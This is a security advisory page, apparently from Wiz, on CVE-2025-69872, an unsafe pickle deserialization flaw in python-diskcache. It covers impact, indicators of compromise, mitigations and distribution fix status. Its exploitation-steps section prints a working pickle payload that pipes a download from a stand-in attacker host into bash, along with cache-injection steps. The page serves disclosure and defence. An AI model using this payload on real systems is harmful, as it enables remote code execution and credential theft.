CVE-2025-69872: 
Python vulnerability analysis and mitigation

Overview

CVE-2025-69872 is an unsafe pickle deserialization vulnerability in DiskCache (python-diskcache) affecting all versions through 5.6.3. The library uses Python's pickle module as its default serialization method without any safety warnings or mitigations, allowing an attacker with write access to the cache directory to achieve arbitrary code execution when a victim application reads from the cache. The vulnerability was discovered on 2025-12-16 by Ethan Taebeom Kim of Cremit and published by MITRE on 2026-02-11. It carries a CVSS v3.1 score of 9.8 (Critical) per Feedly/NVD estimates, though the researcher-assigned CVSS v3.1 score is 7.3 (High) and the GitHub Advisory Database rates it Moderate (5.2 CVSS v4) (GitHub Advisory, Researcher Disclosure).

Technical details

The root cause is the use of Python's pickle module as the default serializer in diskcache/core.py, classified as CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection). Specifically, pickle.load() and pickle.loads() are called at three locations — line 177 (deserializing cache keys), line 282 (deserializing from .val files), and line 284 (deserializing from SQLite) — without any integrity checks or input validation. The attack exploits Python's pickle __reduce__ mechanism, which allows arbitrary callables (e.g., os.system, subprocess.call) to be invoked during deserialization; an attacker crafts a malicious pickle payload and writes it directly to the cache's SQLite database (cache.db) or as a .val file, which is then automatically deserialized when the victim application calls cache.get(). The precondition is filesystem-level write access to the cache directory, achievable via misconfigured permissions (e.g., world-writable /tmp paths) or compromised shared container volumes (GitHub Advisory, Researcher Disclosure).

Impact

Successful exploitation grants the attacker arbitrary code execution within the victim application's process, with all associated privileges, enabling full system compromise. This includes access to environment variables (often containing API keys and database credentials), file system access, and network connectivity, facilitating data exfiltration and credential theft. In containerized or multi-tenant environments where cache directories are shared across pods or services, a single compromised container can be used as a pivot point for lateral movement to other services. With over 2 million monthly PyPI downloads and 500+ dependent packages — including production use in Django, AWS Lambda, Kubernetes, and ML pipelines — the potential blast radius is substantial (Researcher Disclosure).

Exploitability

A proof-of-concept (PoC) is publicly available in the researcher's disclosure, demonstrating both the attacker-side payload injection and victim-side trigger via a standard cache.get() call. There is no confirmed evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.10% (0.041% per GitHub Advisory, 0.102% per Feedly), placing it in a low-to-moderate exploitation probability range. IBM has issued advisories for affected products including IBM Cloud Pak for AIOps, IBM Fusion, IBM Fusion HCI, and IBM Fusion Content-Aware Storage (GitHub Advisory, IBM Advisory).

Exploitation steps

  1. Reconnaissance: Identify target environments using DiskCache (python-diskcache ≤ 5.6.3) with accessible or shared cache directories — look for Django applications, ML pipelines, or containerized services using DiskCache with shared persistent volumes or world-writable /tmp paths.
  2. Gain write access to cache directory: Exploit misconfigured directory permissions (e.g., world-writable cache paths) or leverage a compromised container in a shared-volume environment to obtain write access to the cache directory containing cache.db.
  3. Craft malicious pickle payload: Create a Python object with a __reduce__ method that returns a malicious callable:
import pickle, os
class RCEPayload:
    def __reduce__(self):
        return (os.system, ('curl http://attacker.com/shell.sh | bash',))
malicious_data = pickle.dumps(RCEPayload())
  1. Inject payload into cache database: Write the malicious pickle bytes directly into the cache's SQLite database (cache.db) using any SQLite client, inserting a row that DiskCache will read as a cached value for a known or guessable key.
  2. Trigger deserialization: Wait for (or induce) the victim application to call cache.get('evil_key') or any cache read operation. DiskCache internally calls pickle.load() on the stored data, executing the attacker's payload with the application's privileges.
  3. Achieve objective: The executed payload can establish a reverse shell, exfiltrate credentials from environment variables, or pivot to other services in the network (Researcher Disclosure).

Indicators of compromise

  • File System: Unexpected or recently modified cache.db SQLite files in cache directories; presence of .val files with anomalous binary content (pickle magic bytes \x80\x04 or \x80\x05); new files created in cache directories by unexpected users or processes.
  • Process: Unusual child processes spawned by the Python application process (e.g., bash, sh, curl, wget, python) that are not part of normal application behavior; unexpected outbound network connections from the application process.
  • Logs: Application logs showing errors or exceptions during cache deserialization (e.g., pickle.UnpicklingError if payload fails, or unexpected os.system calls in audit logs); OS-level audit logs (auditd) recording writes to cache directories by unexpected users.
  • Network: Outbound connections to unknown external IPs or domains from the application server, particularly shortly after cache read operations; DNS queries for attacker-controlled domains from the application host (Researcher Disclosure).

Mitigation and workarounds

As of the advisory publication, no patched version of python-diskcache beyond 5.6.3 has been released; the GitHub Advisory lists no patched versions. The primary workaround is to switch from the default pickle serializer to JSONDisk, which uses JSON serialization and cannot execute arbitrary code during deserialization:

from diskcache import Cache, JSONDisk
cache = Cache('/path/to/cache', disk=JSONDisk)

Note that JSONDisk only supports JSON-serializable types. Additionally, restrict cache directory permissions to prevent unauthorized write access (chmod 700 /path/to/cache; chown appuser:appuser /path/to/cache), and in containerized environments, avoid sharing cache volumes across trust boundaries. IBM has issued product-specific advisories for affected IBM products (GitHub Advisory, IBM Advisory, IBM Fusion Advisory).

Community reactions

IBM issued two security bulletins addressing the impact of CVE-2025-69872 on IBM Cloud Pak for AIOps and IBM Fusion product lines (IBM Advisory, IBM Fusion Advisory). The vulnerability was noted in a February 2026 Linux patch Wednesday roundup and covered by Linux security news outlets following Fedora package updates for python-diskcache. The FastMCP project (v3.0.0) and ag2 (v0.12.0) referenced the vulnerability in their release notes as a dependency concern. Community discussion has been limited, with no significant controversy or widespread alarm given the local attack vector requirement.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Affected

bookworm

diskcache

Affected

sid

diskcache

Affected

trixie

diskcache

Affected

Ubuntu

Unknown

devel

diskcache

Unknown

jammy

diskcache

Unknown

jammy (esm-apps)

diskcache

Unknown

noble

diskcache

Unknown

noble (esm-apps)

diskcache

Unknown

resolute

diskcache

Unknown

resolute (esm-apps)

diskcache

Unknown

RHEL / CentOS

Unknown

Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management